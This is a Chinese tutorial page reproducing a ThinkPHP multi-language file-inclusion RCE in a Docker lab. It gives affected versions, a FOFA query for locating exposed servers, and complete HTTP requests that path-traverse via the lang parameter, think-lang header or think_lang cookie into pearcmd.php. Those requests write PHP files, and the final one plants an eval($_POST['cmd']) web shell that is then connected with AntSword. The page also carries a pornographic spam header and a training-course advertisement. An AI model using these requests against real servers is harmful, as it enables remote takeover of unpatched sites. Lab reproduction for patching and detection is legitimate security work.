国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

ThinkPHP多語言模塊文件包含RCE復(fù)現(xiàn)詳細(xì)教程

這篇具有很好參考價值的文章主要介紹了ThinkPHP多語言模塊文件包含RCE復(fù)現(xiàn)詳細(xì)教程。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

免責(zé)聲明
本文章只用于技術(shù)交流,若使用本文章提供的技術(shù)信息進(jìn)行非法操作,后果均由使用者本人負(fù)責(zé)。

漏洞描述:

ThinkPHP在開啟多語言功能的情況下存在文件包含漏洞,攻擊者可以通過get、header、cookie等位置傳入?yún)?shù),實現(xiàn)目錄穿越+文件包含,通過pearcmd文件包含這個trick即可實現(xiàn)RCE。

影響版本:

6.0.1 < ThinkPHP≤ 6.0.13

5.0.0 < ThinkPHP≤ 5.0.12

5.1.0 < ThinkPHP≤ 5.1.8

利用條件:

1、需要Thinkphp開啟多語言功能

2、安裝pear擴(kuò)展

3、知道pearcmd.php路徑

4、register_argc_argv=on

FOFA搜索語法:

header=“think_lang”

環(huán)境搭建:

服務(wù)器首先要有docker環(huán)境,沒有的可以先部署一個

1、docker直接拉取vulfocus 的thinkphp:6.0.12的漏洞環(huán)境鏡像:
docker pull vulfocus/thinkphp:6.0.12
2、啟動容器,將容器的80端口映射到本機(jī)的80端口
docker run  --nametp123 -p80:80 -d鏡像id

瀏覽器訪問:ip+/public/index.php 如下圖則搭建成功:

ThinkPHP多語言模塊文件包含RCE復(fù)現(xiàn)詳細(xì)教程,php,安全,開發(fā)語言

漏洞復(fù)現(xiàn):

pearcmd.php這個文件的一些具體細(xì)節(jié)可以參考這篇文章

<https://www.leavesongs.com/PENETRATION/docker-php-include-
getshell.html#0x06-pearcmdphp>

進(jìn)入容器查看pearcmd.php路徑,執(zhí)行 ````

find / -name pearcmd.php 2>/dev/null

``

/usr/local/lib/php/pearcmd.php

ThinkPHP多語言模塊文件包含RCE復(fù)現(xiàn)詳細(xì)教程,php,安全,開發(fā)語言

EXP:

在/tmp/下生成hello.php
GET /public/index.php?+config-create+/<?=phpinfo()?>+/tmp/hello.php HTTP/1.1  
Host: 192.168.36.128  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Language: zh-CN,zh;q=0.9  
think-lang:../../../../../../../../usr/local/lib/php/pearcmd  
Cookie: think_lang=zh-cn  
Connection: close
進(jìn)入容器查看/tmp/hellp.php

ThinkPHP多語言模塊文件包含RCE復(fù)現(xiàn)詳細(xì)教程,php,安全,開發(fā)語言

包含hello.php
GET /public/index.php HTTP/1.1  
Host: 192.168.36.128  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Language: zh-CN,zh;q=0.9  
think-lang:../../../../../../../../tmp/hello  
Cookie: think_lang=zh-cn  
Connection: close
repeater發(fā)包:

ThinkPHP多語言模塊文件包含RCE復(fù)現(xiàn)詳細(xì)教程,php,安全,開發(fā)語言

看看瀏覽器頁面成功執(zhí)行phpinfo:

ThinkPHP多語言模塊文件包含RCE復(fù)現(xiàn)詳細(xì)教程,php,安全,開發(fā)語言

GET:

直接利用p牛文章中的請求包,需要根據(jù)實際情況改變文件名稱,寫不進(jìn)去可以考慮多加點…/

創(chuàng)建文件
GET /public/index.php?lang=../../../../../../../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?=phpinfo()?>+/tmp/1.php HTTP/1.1  
Host: 192.168.36.128  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: think_lang=zh-cn  
Connection: close
repeater發(fā)包:

ThinkPHP多語言模塊文件包含RCE復(fù)現(xiàn)詳細(xì)教程,php,安全,開發(fā)語言

進(jìn)入容器查看:

ThinkPHP多語言模塊文件包含RCE復(fù)現(xiàn)詳細(xì)教程,php,安全,開發(fā)語言

文件包含/tmp/1.php
GET /public/index.php?lang=../../../../../../../../../../../../tmp/1 HTTP/1.1  
Host: 192.168.36.128  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: think_lang=zh-cn  
Connection: close
repeater發(fā)包:

ThinkPHP多語言模塊文件包含RCE復(fù)現(xiàn)詳細(xì)教程,php,安全,開發(fā)語言

再看看瀏覽器頁面,成功執(zhí)行phpinfo:

ThinkPHP多語言模塊文件包含RCE復(fù)現(xiàn)詳細(xì)教程,php,安全,開發(fā)語言

HEADER:

創(chuàng)建文件
GET /public/index.php?+config-create+/&/<?=phpinfo()?>+/tmp/2.php HTTP/1.1  
Host: 192.168.36.128  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Language: zh-CN,zh;q=0.9  
think-lang:../../../../../../../../../../../../../../usr/local/lib/php/pearcmd  
Cookie: think_lang=zh-cn  
Connection: close
repeater發(fā)包:

ThinkPHP多語言模塊文件包含RCE復(fù)現(xiàn)詳細(xì)教程,php,安全,開發(fā)語言

進(jìn)入容器查看:

ThinkPHP多語言模塊文件包含RCE復(fù)現(xiàn)詳細(xì)教程,php,安全,開發(fā)語言

文件包含/tmp/2.php
GET /public/index.php?lang=../../../../../../../../../../../../tmp/2 HTTP/1.1  
Host: 192.168.36.128  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: think_lang=zh-cn  
Connection: close
repeater發(fā)包:

ThinkPHP多語言模塊文件包含RCE復(fù)現(xiàn)詳細(xì)教程,php,安全,開發(fā)語言

在看看瀏覽器頁面成功執(zhí)行phpinfo:

ThinkPHP多語言模塊文件包含RCE復(fù)現(xiàn)詳細(xì)教程,php,安全,開發(fā)語言

COOKIES:

創(chuàng)建文件
GET /public/index.php?+config-create+/&/<?=phpinfo()?>+/tmp/3.php HTTP/1.1  
Host: 192.168.36.128  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: think_lang=../../../../../../../../../../../../../../usr/local/lib/php/pearcmd  
Connection: close
repeater發(fā)包:

ThinkPHP多語言模塊文件包含RCE復(fù)現(xiàn)詳細(xì)教程,php,安全,開發(fā)語言

進(jìn)入容器查看:

ThinkPHP多語言模塊文件包含RCE復(fù)現(xiàn)詳細(xì)教程,php,安全,開發(fā)語言

文件包含/tmp/3.php
GET /public/index.php?lang=../../../../../../../../../../../../tmp/3 HTTP/1.1  
Host: 192.168.36.128  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36  
Sec-Purpose: prefetch;prerender  
Purpose: prefetch  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: think_lang=zh-cn  
Connection: close
repeater發(fā)包:

ThinkPHP多語言模塊文件包含RCE復(fù)現(xiàn)詳細(xì)教程,php,安全,開發(fā)語言

在看看瀏覽器頁面成功執(zhí)行phpinfo:

ThinkPHP多語言模塊文件包含RCE復(fù)現(xiàn)詳細(xì)教程,php,安全,開發(fā)語言

GETSHELL

于是我梅開二度決定寫入一個馬子試試:

這次我們直接寫到網(wǎng)站根目錄(注:phpinfo可以查看網(wǎng)站絕對路徑)

ThinkPHP多語言模塊文件包含RCE復(fù)現(xiàn)詳細(xì)教程,php,安全,開發(fā)語言

寫入文件
GET /public/index.php?lang=../../../../../../../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?=@eval($_POST['cmd']);?>+/var/www/html/shell.php HTTP/1.1  
Host: 192.168.36.128  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: think_lang=zh-cn  
Connection: close
repeater發(fā)包:

ThinkPHP多語言模塊文件包含RCE復(fù)現(xiàn)詳細(xì)教程,php,安全,開發(fā)語言

瀏覽器訪問:

ThinkPHP多語言模塊文件包含RCE復(fù)現(xiàn)詳細(xì)教程,php,安全,開發(fā)語言

蟻劍成功連接:

ThinkPHP多語言模塊文件包含RCE復(fù)現(xiàn)詳細(xì)教程,php,安全,開發(fā)語言

最后

分享一個快速學(xué)習(xí)【網(wǎng)絡(luò)安全】的方法,「也許是」最全面的學(xué)習(xí)方法:
1、網(wǎng)絡(luò)安全理論知識(2天)
①了解行業(yè)相關(guān)背景,前景,確定發(fā)展方向。
②學(xué)習(xí)網(wǎng)絡(luò)安全相關(guān)法律法規(guī)。
③網(wǎng)絡(luò)安全運營的概念。
④等保簡介、等保規(guī)定、流程和規(guī)范。(非常重要)

2、滲透測試基礎(chǔ)(一周)
①滲透測試的流程、分類、標(biāo)準(zhǔn)
②信息收集技術(shù):主動/被動信息搜集、Nmap工具、Google Hacking
③漏洞掃描、漏洞利用、原理,利用方法、工具(MSF)、繞過IDS和反病毒偵察
④主機(jī)攻防演練:MS17-010、MS08-067、MS10-046、MS12-20等

3、操作系統(tǒng)基礎(chǔ)(一周)
①Windows系統(tǒng)常見功能和命令
②Kali Linux系統(tǒng)常見功能和命令
③操作系統(tǒng)安全(系統(tǒng)入侵排查/系統(tǒng)加固基礎(chǔ))

4、計算機(jī)網(wǎng)絡(luò)基礎(chǔ)(一周)
①計算機(jī)網(wǎng)絡(luò)基礎(chǔ)、協(xié)議和架構(gòu)
②網(wǎng)絡(luò)通信原理、OSI模型、數(shù)據(jù)轉(zhuǎn)發(fā)流程
③常見協(xié)議解析(HTTP、TCP/IP、ARP等)
④網(wǎng)絡(luò)攻擊技術(shù)與網(wǎng)絡(luò)安全防御技術(shù)
⑤Web漏洞原理與防御:主動/被動攻擊、DDOS攻擊、CVE漏洞復(fù)現(xiàn)

5、數(shù)據(jù)庫基礎(chǔ)操作(2天)
①數(shù)據(jù)庫基礎(chǔ)
②SQL語言基礎(chǔ)
③數(shù)據(jù)庫安全加固

6、Web滲透(1周)
①HTML、CSS和JavaScript簡介
②OWASP Top10
③Web漏洞掃描工具
④Web滲透工具:Nmap、BurpSuite、SQLMap、其他(菜刀、漏掃等)

ThinkPHP多語言模塊文件包含RCE復(fù)現(xiàn)詳細(xì)教程,php,安全,開發(fā)語言

恭喜你,如果學(xué)到這里,你基本可以從事一份網(wǎng)絡(luò)安全相關(guān)的工作,比如滲透測試、Web 滲透、安全服務(wù)、安全分析等崗位;如果等保模塊學(xué)的好,還可以從事等保工程師。薪資區(qū)間6k-15k。

到此為止,大概1個月的時間。你已經(jīng)成為了一名“腳本小子”。那么你還想往下探索嗎?

想要入坑黑客&網(wǎng)絡(luò)安全的朋友,給大家準(zhǔn)備了一份:282G全網(wǎng)最全的網(wǎng)絡(luò)安全資料包免費領(lǐng)??!
掃下方二維碼,免費領(lǐng)取

有了這些基礎(chǔ),如果你要深入學(xué)習(xí),可以參考下方這個超詳細(xì)學(xué)習(xí)路線圖,按照這個路線學(xué)習(xí),完全夠支撐你成為一名優(yōu)秀的中高級網(wǎng)絡(luò)安全工程師:
ThinkPHP多語言模塊文件包含RCE復(fù)現(xiàn)詳細(xì)教程,php,安全,開發(fā)語言

高清學(xué)習(xí)路線圖或XMIND文件(點擊下載原文件)

還有一些學(xué)習(xí)中收集的視頻、文檔資源,有需要的可以自?。?/strong>
每個成長路線對應(yīng)板塊的配套視頻:
ThinkPHP多語言模塊文件包含RCE復(fù)現(xiàn)詳細(xì)教程,php,安全,開發(fā)語言
ThinkPHP多語言模塊文件包含RCE復(fù)現(xiàn)詳細(xì)教程,php,安全,開發(fā)語言
當(dāng)然除了有配套的視頻,同時也為大家整理了各種文檔和書籍資料&工具,并且已經(jīng)幫大家分好類了。
ThinkPHP多語言模塊文件包含RCE復(fù)現(xiàn)詳細(xì)教程,php,安全,開發(fā)語言
因篇幅有限,僅展示部分資料,需要的可以【掃下方二維碼免費領(lǐng)取】
文章來源地址http://www.zghlxwxcb.cn/news/detail-721150.html

到了這里,關(guān)于ThinkPHP多語言模塊文件包含RCE復(fù)現(xiàn)詳細(xì)教程的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進(jìn)行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費用

相關(guān)文章

  • CTFHub筆記之技能樹RCE:eval執(zhí)行、文件包含、遠(yuǎn)程包含、php://input、讀取源代碼

    CTFHub筆記之技能樹RCE:eval執(zhí)行、文件包含、遠(yuǎn)程包含、php://input、讀取源代碼

    小白一個,記錄解題過程,如有錯誤請指正! 知識點: ????????eval():把字符串 code 作為PHP代碼執(zhí)行。函數(shù)eval()語言結(jié)構(gòu)是非常危險的,因為它允許執(zhí)行任意 PHP 代碼。它這樣用是很危險的。如果您仔細(xì)的確認(rèn)過,除了使用此結(jié)構(gòu)以外別無方法, 請多加注意,不要允許傳入

    2024年02月01日
    瀏覽(21)
  • ThinkPHP5 5.0.23遠(yuǎn)程代碼執(zhí)行漏洞+webshell工具連接(復(fù)現(xiàn)詳細(xì)過程)

    ThinkPHP5 5.0.23遠(yuǎn)程代碼執(zhí)行漏洞+webshell工具連接(復(fù)現(xiàn)詳細(xì)過程)

    目錄 漏洞介紹 漏洞復(fù)現(xiàn) 1.環(huán)境搭建 2.漏洞利用 5.0.23以前的版本中,獲取method的方法中沒有正確處理方法名,導(dǎo)致攻擊者可以調(diào)用Request類任意方法并構(gòu)造利用鏈,從而導(dǎo)致遠(yuǎn)程代碼執(zhí)行漏洞。 1.環(huán)境搭建 使用docker容器搭建漏洞環(huán)境,進(jìn)入漏洞文件所在。 cd vulhub/thinkphp/5.0.2

    2024年02月06日
    瀏覽(22)
  • thinkphp 5-rce(rce漏洞getshell)

    thinkphp 5-rce(rce漏洞getshell)

    ?vulhub靶場 http://xxxxx:8080/?s=/Index/thinkapp/invokefunctionfunction=call_user_func_arrayvars[0]=systemvars[1][]=whoami ?驗證漏洞 linux系統(tǒng),可以用touch命令創(chuàng)建文件 http://xxxxx:8080/?s=/Index/thinkapp/invokefunctionfunction=call_user_func_arrayvars[0]=systemvars[1][]= touch mm.php 再用echo寫入一句話 http://xxxxx:8080/index.

    2024年02月14日
    瀏覽(45)
  • 文件包含漏洞及漏洞復(fù)現(xiàn)

    文件包含漏洞及漏洞復(fù)現(xiàn)

    程序開發(fā)人員通常會把可重復(fù)使用函數(shù)或語句寫到單個文件中,形成“封裝”。在使用某個功能的時候,直接調(diào)用此文件,無需再次編寫,提高代碼重用性,減少代碼量。這種調(diào)用文件的過程通常稱為包含。 程序開發(fā)人員都希望代碼更加靈活,所以會把被包含的文件的路徑設(shè)

    2024年02月10日
    瀏覽(22)
  • PHP文件包含漏洞(利用phpinfo)復(fù)現(xiàn)

    PHP文件包含漏洞(利用phpinfo)復(fù)現(xiàn)

    PHP文件包含漏洞中,如果找不到可以包含的文件,我們可以通過包含臨時文件的方法來拿到權(quán)限。因為臨時文件名是隨機(jī)的,如果目標(biāo)網(wǎng)站上存在phpinfo,則可以通過phpinfo來獲取臨時文件名,進(jìn)而進(jìn)行包含。 在給PHP發(fā)送POST數(shù)據(jù)包時,如果數(shù)據(jù)包里包含文件區(qū)塊,無論你訪問的

    2024年02月16日
    瀏覽(23)
  • CVE-2020-1938?Tomcat文件包含漏洞復(fù)現(xiàn)

    CVE-2020-1938?Tomcat文件包含漏洞復(fù)現(xiàn)

    Apache Tomcat文件包含漏洞(CNVD-2020-10487/CVE-2020-1938)。該漏洞是由于Tomcat AJP協(xié)議存在缺陷而導(dǎo)致,攻擊者利用該漏洞可通過構(gòu)造特定參數(shù),讀取服務(wù)器webapp下的任意文件。若目標(biāo)服務(wù)器同時存在文件上傳功能,攻擊者可進(jìn)一步實現(xiàn)遠(yuǎn)程代碼執(zhí)行。AJP(Apache JServ Protocol)是定向包

    2024年02月08日
    瀏覽(28)
  • 【漏洞復(fù)現(xiàn)】E-office文件包含漏洞

    【漏洞復(fù)現(xiàn)】E-office文件包含漏洞

    Weaver E-Office是中國泛微科技(Weaver)公司的一個協(xié)同辦公系統(tǒng)。泛微 E-Office 是一款標(biāo)準(zhǔn)化的協(xié)同 OA 辦公軟件,實行通用化產(chǎn)品設(shè)計,充分貼合企業(yè)管理需求,本著簡潔易用、高效智能的原則,為企業(yè)快速打造移動化、無紙化、數(shù)字化的辦公平臺。 該漏洞是由于存在文件包含

    2024年02月09日
    瀏覽(20)
  • ThinkPHP5.0.0~5.0.23RCE 漏洞分析及挖掘思路

    ThinkPHP5.0.0~5.0.23RCE 漏洞分析及挖掘思路

    前言 本節(jié)我將分析thinkphp5.0.x 版本的RCE漏洞,根據(jù)漏洞的研究模擬挖掘此漏洞的思路 本次分析框架下載,由于官方已經(jīng)下架了相關(guān)的下載接口,這里我們用三方下載 一份v5.0.22版本的 升級中... https://www.codejie.net/5828.html 附贈?thinkphp5.0官方開發(fā)手冊 架構(gòu)總覽 · ThinkPHP5.0完全開

    2024年01月18日
    瀏覽(30)
  • ThinkPHP5.0.0~5.0.23路由控制不嚴(yán)謹(jǐn)導(dǎo)致的RCE

    ThinkPHP5.0.0~5.0.23路由控制不嚴(yán)謹(jǐn)導(dǎo)致的RCE

    本次我們繼續(xù)以漏洞挖掘者的視角,來分析thinkphp的RCE 敏感函數(shù)發(fā)現(xiàn) 在調(diào)用入口函數(shù):/ThinkPHP_full_v5.0.22/public/index.php 時 發(fā)現(xiàn)了框架底層調(diào)用了thinkphplibrarythinkApp.php的app類中的incokeMethod方法 ?注意傳遞的參數(shù),ReflectionMethod接受的參數(shù)。如果是數(shù)組的形式, 那么參數(shù)1是這個

    2024年01月23日
    瀏覽(19)
  • 【漏洞復(fù)現(xiàn)】Aapache_Tomcat_AJP協(xié)議_文件包含漏洞(CVE-2020-1938)

    【漏洞復(fù)現(xiàn)】Aapache_Tomcat_AJP協(xié)議_文件包含漏洞(CVE-2020-1938)

    感謝互聯(lián)網(wǎng)提供分享知識與智慧,在法治的社會里,請遵守有關(guān)法律法規(guī) 說明 內(nèi)容 漏洞編號 CVE-2020-1938 漏洞名稱 Aapache_Tomcat_AJP文件包含漏洞 漏洞評級 高危 影響范圍 Tomcat 9.0.30 漏洞描述 由于 Tomcat AJP 協(xié)議設(shè)計上存在缺陷,攻擊者通過 Tomcat AJP Connector 可以讀取或包含 Tomca

    2024年02月05日
    瀏覽(20)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包